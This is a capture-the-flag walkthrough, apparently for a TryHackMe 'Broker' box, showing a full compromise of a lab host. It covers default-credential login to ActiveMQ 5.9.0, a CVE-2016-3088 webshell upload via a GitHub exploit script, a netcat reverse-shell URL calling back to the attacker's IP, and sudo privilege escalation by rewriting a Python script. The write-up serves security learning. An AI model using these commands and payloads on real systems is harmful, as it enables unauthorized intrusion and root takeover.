BROKER EASY WRITEUP
BOX DISCRIPTION:-
⭐its Medium Box ,but its not medium box🙂 its too easy Box😏
⭐User falg with Out dated Software CVE exploit
⭐Root flag Misconfiguration
Enumeration:
As usual i'm start with nmap scan 😅
Nmap
initial nmap scan , nmap -sV -sC <IP> -A
Result;
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4c:75:a0:7b:43:87:70:4f:70:16:d2:3c:c4:c5:a4:e9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0E0J6enJ0afxy700qSiIX5MtF1OnZao36BxMDHd4z3X/fbRQc3WOsCzY9KsTw7RltG4bSBJGja3ppRbiLTowv+2aunR3nKPaR/Rea1NFCHPxonnYutUyqPsJIRnm+oV+hqd/rvn/BgLpdNo2bpWG1PG3gNVwmbuUqybL9XF3KoZz8gj6zZPJ+RV8yrM17R2bd1J7YgTMJBKSuKyzVQZJQHJMhdBLBOfVmF3PgajXe2Dm10xbL2rQ3Zsbbuk6hhc4Ypq1LYeZ1PA0aNuHoMzhjXlYQ3XElD5Rzr6rBo5LJr2VD2Y3mo86wyM6OZBb+B88Law3RJ4fwtjVgEoa2KX0F
| 256 f4:62:b2:ad:f8:62:a0:91:2f:0a:0e:29:1a:db:70:e4 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHyqJ0DAEyEKxeir3lNhPLTZNtDo/CfpLAKWpiSxZUd8NJIrcsNod31Tl+KSwMvNjNvW2ilD1YYxnO2A3FDApqg=
| 256 92:d2:87:7b:98:12:45:93:52:03:5e:9e:c7:18:71:d5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINqDlHwUjvqNDfhowAQHQMu7A/HVUijCXkxdkgpF/pSe
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
No Port 80 or 8080
Cool Lets run Full port scan With Nmap
i reccommad full ports scan tools instead of nmap use Masscan or Rustscan
its Compare to nmap faster than nmap port scan
Nmap Port Scan
nmap -p 1000-10000 10.10.110.80 -vv
because he mentioned in Room
Result
PORT STATE SERVICE REASON
1883/tcp open mqtt syn-ack
8161/tcp open patrol-snmp syn-ack
Sweet... we got Port 1883 and 8161
PORT 1883 is mqtt
PORT 8161 i don't know ok lets enum it :)
PORT 8161
 |
| Main page |
Yep its mobile screen shot ,iam forgot to take pictures on lap now my lap is dead🚶 so
wow its http Port !! And its also have Sign in option
lets try Default Username/Passwords
like admin:password
admin:admin
 |
| ADMIN PAGE |
Wow!! we are in Admin Panel
its ActiveMQ website check Admin Page Properly we Got the version info
its ActiveMQ version 5.9.0
its out Dated Software Also We have Lot of exploits in Github and Metsaploit
I'd know Metasploit exploit is not worked for me 💔
its pretty easy Box so we use Github exploit
iam using this exploit its perfect ❤️
copy this😁
git clone https://github.com/gsheller/ActiveMQ_putshell-CVE-2016-3088
STEPS To EXPLOIT THE ActiveMQ 5.9.0
1) cd ActiveMQ_putshell-CVE-2016-3088
2) python ActiveMQ_putshell.py -u http://<$IP>:8161
OUTPUT:
____ _ _ _
| _ \ | | | || |
| |_) | _ _ __ _ ___ | |__ ___ | || |
| _ < | | | | / _` |/ __|| '_ \ / _ \| || |
| |_) || |_| | | (_| |\__ \| | | || __/| || |
|____/ \__, | \__, ||___/|_| |_| \___||_||_|
__/ | __/ |
|___/ |___/
ActiveMQ_put_path:/opt/apache-activemq-5.9.0/webapps/
ActiveMQ_put__txt:http://10.10.110.80:8161/fileserver/guo.txt
ActiveMQ_putshell:http://10.10.110.80:8161/admin/guo.jsp
Our webshell Uploaded Sucessfully 🙂
Lets Chect it
Copy my command for Reverse shell
First i tried bash revrseshell but its not work😔
Hope fully Victim machine have netcat 😌
command
http://<$IP>:8161/admin/guo.jsp?pwd=gshell&shell=nc%20<YOUR IP>%209001%20-e%20/bin/sh
Be sure Update Your ip's And listen on local Machine 😜
Baaaang💨!!! Got Reverse connection
USER FLAG
activemq@activemq:/opt/apache-activemq-5.9.0$ ls
ls
LICENSE activemq-all-5.9.0.jar conf lib subscribe.py
NOTICE bin data start.sh tmp
README.txt chat.py flag.txt subcribe.py webapps
activemq@activemq:/opt/apache-activemq-5.9.0$ cat flag.txt
cat flag.txt
THM{youXXXXXXXX}
activemq@activemq:/opt/apache-activemq-5.9.0$
ROOT FLAG
Run Sudo -l to check what permission we run at root🔥
sudo -l
Matching Defaults entries for activemq on activemq:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User activemq may run the following commands on activemq:
(root) NOPASSWD: /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
Cool we run /opt/apache-activemq-5.9.0/subscribe.py in Sudo
Here is the Payload for Privilleged Escalation
Copy Paste😁
echo "import os" > subscribe.py
echo 'os.system("bash")' >> subscribe.py
sudo /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
BOOOM! haha we are ROOT
root@activemq:~# cat root.txt
cat root.txt
THM{brXXXXXXXX}
root@activemq:~#
Thats it
Post a Comment